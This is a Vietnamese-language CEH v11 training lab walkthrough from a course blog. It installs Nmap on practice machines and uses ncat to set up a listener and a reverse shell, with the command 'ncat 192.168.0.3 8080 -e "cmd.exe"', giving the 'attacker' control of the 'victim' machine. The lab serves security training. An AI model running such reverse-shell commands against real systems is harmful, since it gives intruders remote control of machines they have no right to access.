Bài tập 4 – Thực hiện chuyển hướng cổng

CEH v11 Online Lab : Module 6 Malware Threat – Lab 1 Fork Bomb

CEH v11 Online Lab : Module 6 Malware Threat – Lab 2 Theo dõi việc sử dụng cổng

CEH v11 Online Lab : Module 6 Malware Threat – Lab 3 Xác định các cổng mở

Lưu ý : Các bạn hãy hoàn tất Bài tập 4 theo thời hạn yêu cầu và xuất report (cách được khuyến nghị) hoặc chụp ảnh màn hình trên plab gởi cho BQT. Nếu không thực hiện việc làm lab quá 3 bài BQT sẽ limit tài khoản , việc tuân thủ nội quy sẽ giúp cho các bạn học tập tốt hơn.

Đây là bài học và yêu cầu làm lab từ BQT

Tham gia lớp học : https://akademy.edu.vn/course/khoa-hoc-cehv11-truc-tuyen/

Bạn có thể thực hiện chuyển hướng cổng bằng cách sử dụng netcat, còn được gọi là ncat, tiện ích dòng lệnh có sẵn cho các nền tảng Linux, UNIX và Windows. Tiện ích dòng lệnh này đọc thông tin từ các kết nối sử dụng TCP hoặc UDP để thực hiện chuyển hướng cổng đơn giản.

Có hai thực thể trong quá trình chuyển hướng cổng, đó là kẻ tấn công và nạn nhân. Bước đầu tiên kẻ tấn công lắng nghe trên một cổng để gửi và nhận dữ liệu. Kẻ tấn công sẽ thả một tải trọng độc hại (payload) trên hệ thống của nạn nhân để thực hiện các lệnh cấp hệ thống và chuyển hướng lưu lượng đến cổng liên quan trên hệ thống của kẻ tấn công. Tải trọng có thể được gửi qua email, tập lệnh được tạo, tệp độc hại, v.v. Trọng tải cũng có thể được phân phối thông qua một tập lệnh hàng loạt.

Trong bài tập này, bạn sẽ thực hiện chuyển hướng cổng bằng lệnh ncat.

Kết quả học tập

Sau khi hoàn thành bài tập này, bạn sẽ có thể:

  • Cài đặt Nmap
  • Sử dụng Netcat để thực hiện chuyển hướng cổng

Thiết bị của bạn

Bạn sẽ sử dụng các thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn này ngay bây giờ.

  • PLABDC01 – (Windows Server 2019 – Máy chủ miền)
  • PLABDM01 – (Windows Server 2019 – Thành viên miền)
  • PLABWIN10 – (Windows 10 – Máy trạm)
Ảnh chụp màn hình Practice Labs.

Nhiệm vụ 1 – Cài đặt Nmap

Tiện ích Netcat được tích hợp sẵn với Zenmap GUI, là phiên bản GUI của Nmap. Netcat được tạo sẵn với Zenmap được gọi là Ncat.

BQT : Ngoài ra, các bạn có thể linh động triển khai bài tập trên Parrot OS và chụp hình vẫn đáp ứng yêu cầu bài tập

Trong tác vụ này, bạn sẽ cài đặt Nmap, cũng chứa Zenmap.

Bước 1

Đảm bảo bạn đã cấp nguồn cho các thiết bị cần thiết và kết nối với PLABWIN10 .

Truy cập Intranet bằng cách khởi chạy Internet Explorer .

Hình 4.1 Ảnh chụp màn hình PLABWIN10
Hình 4.1 Ảnh chụp màn hình PLABWIN10: Hiển thị Intranet làm trang chủ trong Internet Explorer.

Bước 2

Nhấp vào Công cụ .

Hình 4.2 Ảnh chụp màn hình PLABWIN10
Hình 4.2 Ảnh chụp màn hình PLABWIN10: Nhấp vào Công cụ trên trang chủ Intranet.

Bước 3

Nhấp vào nmap .

Hình 4.3 Ảnh chụp màn hình PLABWIN10
Hình 4.3 Ảnh chụp màn hình PLABWIN10: Nhấp vào nmap trên trang chủ Intranet.

Bước 4

Nhấp vào nmap-5.51-setup.exe.

Hình 4.4 Ảnh chụp màn hình PLABWIN10
Hình 4.4 Ảnh chụp màn hình PLABWIN10: Nhấp vào tệp nmap trên trang chủ Intranet.

Bước 5

Trong thanh thông báo, nhấp vào Chạy .

Hình 4.5 Ảnh chụp màn hình PLABWIN10
Hình 4.5 Ảnh chụp màn hình PLABWIN10: Nhấp vào Chạy trên thanh thông báo.

Bước 6

Các cài đặt Nmap thuật sĩ sẽ được hiển thị. Trên trang Thỏa thuận Cấp phép , hãy nhấp vào Tôi Đồng ý .

Hình 4.6 Ảnh chụp màn hình PLABWIN10
Hình 4.6 Ảnh chụp màn hình PLABWIN10: Nhấp vào I Agree trên hộp thoại Nmap Setup.

Bước 7

Trên trang Chọn thành phần , giữ lựa chọn mặc định và nhấp vào Tiếp theo .

Hình 4.7 Ảnh chụp màn hình PLABWIN10
Hình 4.7 Ảnh chụp màn hình PLABWIN10: Nhấp vào Tiếp theo trên trang Chọn thành phần.

Bước 8

Trên trang Chọn vị trí cài đặt , giữ nguyên đường dẫn cài đặt mặc định và nhấp vào Cài đặt .

Hình 4.8 Ảnh chụp màn hình PLABWIN10
Hình 4.8 Ảnh chụp màn hình PLABWIN10: Nhấp vào Cài đặt trên Chọn Vị trí Cài đặt.

Bước 9

Trên trang Cài đặt , tiến trình cài đặt được hiển thị.

Hình 4.9 Ảnh chụp màn hình PLABWIN10
Hình 4.9 Ảnh chụp màn hình PLABWIN10: Hiển thị tiến trình cài đặt trên trang Cài đặt.

Bước 10

Trong khi cài đặt, hộp thoại Thiết lập WinPcap (Nmap) 4.1.2 sẽ hiển thị. Nó nhắc thay thế phiên bản WinPcap cũ hơn trên hệ thống. Nhấp vào  để tiến hành thay thế.

Hình 4.10 Ảnh chụp màn hình PLABWIN10
Hình 4.10 Ảnh chụp màn hình PLABWIN10: Nhấp vào Yes trên hộp thoại Cài đặt WinPcap (Nmap) 4.1.2.

Bước 11

Các WinPcap (Nmap) 4.1.2 Cài đặt Wizard được hiển thị. Trên trang Thỏa thuận Cấp phép , hãy nhấp vào Tôi Đồng ý .

Hình 4.11 Ảnh chụp màn hình PLABWIN10
Hình 4.11 Ảnh chụp màn hình PLABWIN10: Nhấp vào Tôi đồng ý trên trang Thỏa thuận cấp phép.

Bước 12

Trên trang Hoàn tất Cài đặt , bấm Tiếp theo .

Hình 4.12 Ảnh chụp màn hình PLABWIN10
Hình 4.12 Ảnh chụp màn hình PLABWIN10: Nhấp vào Tiếp theo trên trang Hoàn tất cài đặt.

Bước 13

Trên trang Tùy chọn WinPcap , giữ các lựa chọn mặc định và nhấp vào Tiếp theo .

Hình 4.13 Ảnh chụp màn hình PLABWIN10
Hình 4.13 Ảnh chụp màn hình PLABWIN10: Nhấp vào Tiếp theo trên trang Tùy chọn WinPcap.

Bước 14

Trên trang Hoàn tất , bấm Kết thúc .

Hình 4.14 Ảnh chụp màn hình PLABWIN10
Hình 4.14 Ảnh chụp màn hình PLABWIN10: Nhấp vào Kết thúc trên trang Kết thúc.

Bước 15

Các cài đặt Nmap thuật sĩ lại xuất hiện. Trên trang Cài đặt , tiến trình cài đặt được hiển thị.

Hình 4.15 Ảnh chụp màn hình PLABWIN10
Hình 4.15 Ảnh chụp màn hình PLABWIN10: Hiển thị tiến trình cài đặt trên trang Cài đặt.

Bước 16

Trên trang Hoàn tất Cài đặt , bấm Tiếp theo .

Hình 4.16 Ảnh chụp màn hình PLABWIN10
Hình 4.16 Ảnh chụp màn hình PLABWIN10: Nhấp vào Tiếp theo trên trang Hoàn tất cài đặt.

Bước 17

Trên trang Tạo lối tắt , giữ nguyên lựa chọn mặc định và bấm Tiếp theo .

Hình 4.17 Ảnh chụp màn hình PLABWIN10
Hình 4.17 Ảnh chụp màn hình PLABWIN10: Nhấp vào Tiếp theo trên trang Tạo lối tắt.

Bước 18

Trên trang Hoàn tất , bấm Kết thúc .

Hình 4.18 Ảnh chụp màn hình PLABWIN10
Hình 4.18 Ảnh chụp màn hình PLABWIN10: Nhấp vào Kết thúc trên trang Hoàn tất.

Bước 19

Đóng Internet Explorer .

Hình 4.19 Ảnh chụp màn hình PLABWIN10
Hình 4.19 Ảnh chụp màn hình PLABWIN10: Đóng cửa sổ Internet Explorer.

Nhiệm vụ 2 – Sử dụng Netcat để thực hiện chuyển hướng cổng

Trong nhiệm vụ này, thiết bị PLABDM01 sẽ là nạn nhân và thiết bị PLABWIN10 sẽ là kẻ tấn công. Hãy xem xét cổng 8080 làm ví dụ. Kẻ tấn công sẽ nghe trên cổng 8080 trên thiết bị PLABWIN10 bằng lệnh ncat . Bạn sẽ thực thi lệnh shell, là cmd.exe của nạn nhân trên thiết bị PLABDM01 , và chuyển hướng nó đến hệ thống của kẻ tấn công nơi kẻ tấn công có thể kiểm soát toàn bộ hệ thống.

Bước 1

Kết nối với PLABWIN10 .

Trong hộp văn bản Nhập vào đây để tìm kiếm , hãy nhập lệnh sau:

cmd

Từ kết quả tìm kiếm, chọn Command Prompt .

Hình 4.20 Ảnh chụp màn hình PLABWIN10
Hình 4.20 Ảnh chụp màn hình PLABWIN10: Chọn Command Prompt từ kết quả tìm kiếm.

Bước 2

Cửa sổ Command Prompt mở ra.

Để thiết lập trình nghe, tại dấu nhắc, hãy nhập lệnh sau:

ncat -v -l -p 8080

Nhấn Enter .Lưu ý: Tham số “- v ” xác định chế độ tiết, chế độ này sẽ in bất kỳ thông tin bổ sung nào. Tham số “- l ” xác định “Nghe”. Tham số “- p ” xác định số cổng.

Hình 4.21 Ảnh chụp màn hình PLABWIN10
Hình 4.21 Ảnh chụp màn hình PLABWIN10: Thực hiện lệnh ncat trong cửa sổ nhắc lệnh.

Bước 3

Các Windows Security Alert hộp thoại sẽ được hiển thị. Nhấp vào Cho phép truy cập .

Hình 4.22 Ảnh chụp màn hình PLABWIN10
Hình 4.22 Ảnh chụp màn hình PLABWIN10: Nhấp vào Cho phép truy cập trên hộp thoại Cảnh báo Bảo mật của Windows.

Khi thực hiện lệnh, kẻ tấn công đang nghe thành công trên cổng 8080 .

Hình 4.23 Ảnh chụp màn hình PLABWIN10
Hình 4.23 Ảnh chụp màn hình PLABWIN10: Hiển thị kết nối thành công trên cổng 8080.

Bước 4

Kết nối với PLABDM01 . Đóng cửa sổ Trình quản lý máy chủ .

Hình 4.24 Ảnh chụp màn hình PLABDM01
Hình 4.24 Ảnh chụp màn hình PLABDM01: Đóng cửa sổ Server Manager.

Bước 5

Cảnh báo: Bạn cần cài đặt Nmap và WinPcap trên PLABDM01 theo bước tương tự như bạn đã làm trong tác vụ trước đó để cài đặt trên PLABWIN10 . Nếu không cài đặt Nmap, bạn sẽ không thể thực hiện các bước còn lại trong tác vụ này.

Để mở Command Prompt , nhấp chuột phải vào nút Start và chọn Run .

Hình 4.25 Ảnh chụp màn hình PLABDM01
Hình 4.25 Ảnh chụp màn hình PLABDM01: Nhấp chuột phải vào nút Windows và chọn Run từ menu ngữ cảnh.

Bước 6

Các Run hộp thoại sẽ được hiển thị. Trong hộp văn bản Mở , nhập nội dung sau:

cmd

Bấm OK .

Hình 4.26 Ảnh chụp màn hình PLABDM01
Hình 4.26 Ảnh chụp màn hình PLABDM01: Nhập lệnh cmd trong hộp văn bản Mở trên hộp thoại Chạy.

Bước 7

Cửa sổ nhắc lệnh mở ra.

Để chuyển hướng trình bao lệnh ( cmd.exe ) đến hệ thống của kẻ tấn công, PLABWIN10 , tại dấu nhắc, hãy nhập lệnh sau:

ncat 192.168.0.3 8080 -e "cmd.exe"

Lưu ý: Tham số 192.168.0.3 xác định địa chỉ IP của hệ thống kẻ tấn công. Tham số -e là viết tắt của Execute. Tham số cmd.exe là viết tắt của Command Shell.

Tải trọng trên thiết bị nạn nhân được thực thi và lưu lượng truy cập được chuyển hướng đến cổng 8080 trên hệ thống của kẻ tấn công với địa chỉ IP 192.168.0.3, đó là thiết bị PLABWIN10 .

Hình 4.27 Ảnh chụp màn hình PLABDM01
Hình 4.27 Ảnh chụp màn hình PLABDM01: Nhập lệnh ncat trong cửa sổ lệnh.

Bước 8

Chuyển về PLABWIN10 .

Kẻ tấn công lấy lệnh shell của nạn nhân trên cửa sổ lắng nghe. Lệnh Shell ( cmd.exe ) từ nạn nhân được chuyển hướng thành công đến hệ thống của kẻ tấn công.

Hình 4.28 Ảnh chụp màn hình PLABWIN10
Hình 4.28 Ảnh chụp màn hình PLABWIN10: Hiển thị dấu nhắc lệnh được chuyển hướng thành công đến hệ thống của kẻ tấn công.

Bước 9

Để xác minh xem kẻ tấn công có hoàn toàn kiểm soát shell lệnh của hệ thống nạn nhân hay không, trong cửa sổ Command Prompt trên thiết bị PLABWIN10 , tại dấu nhắc, hãy nhập lệnh sau:

hostname

Nhấn Enter .

Hình 4.29 Ảnh chụp màn hình PLABWIN10
Hình 4.29 Ảnh chụp màn hình PLABWIN10: Nhập lệnh tên máy chủ trong cửa sổ lệnh.

Bước 10

Tên máy chủ “ PLABDM01 ” được hiển thị dưới dạng đầu ra lệnh. Điều này cho thấy kẻ tấn công ( PLABWIN10 ) hoàn toàn kiểm soát thiết bị của nạn nhân ( PLABDM01 ).

Hình 4.30 Ảnh chụp màn hình PLABWIN10
Hình 4.30 Ảnh chụp màn hình PLABWIN10: Hiển thị đầu ra của lệnh tên máy chủ.

Bước 11

Bây giờ kẻ tấn công hoàn toàn kiểm soát hệ thống của nạn nhân và có thể thực hiện bất kỳ hành động nào mong muốn như duyệt tệp, tạo cửa sau liên tục, v.v.

Để hiển thị cấu hình IP của thiết bị nạn nhân ( PLABDM01 ), trong cửa sổ Command Prompt trên thiết bị PLABWIN10 , tại dấu nhắc, hãy nhập lệnh sau:

ipconfig

Nhấn Enter .

Hình 4.31 Ảnh chụp màn hình PLABWIN10
Hình 4.31 Ảnh chụp màn hình PLABWIN10: Nhập lệnh ipconfig trong cửa sổ lệnh.

Bước 12

Lệnh hiển thị chi tiết cấu hình IP của thiết bị PLABDM01 .

Hình 4.32 Ảnh chụp màn hình PLABWIN10
Hình 4.32 Ảnh chụp màn hình PLABWIN10: Hiển thị đầu ra của lệnh ipconfig.

Nhấp vào nút để chụp ảnh màn hình PLABDM01 . Đóng tất cả các cửa sổ đang mở.

Sau khi hoàn tất các bài trên Security365 Practice Labs các bạn có thể thực hiện tiếp phần lab của CEH v11 Lab Guide, lưu ý không làm CEH v11 Lab Guide khi chưa hoàn tất Practice Onlien Labs. Nếu không BQT sẽ không hồi đáp hay support nếu thực hành không theo lộ trình đặt ra.


1 bình luận cho “CEH v11 Online Lab : Module 6 Malware Threat – Bài Tập Bắt Buộc “Thực hiện chuyển hướng cổng””

Trả lời

Bạn cần phải đăng nhập để gửi bình luận:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s

%d người thích bài này: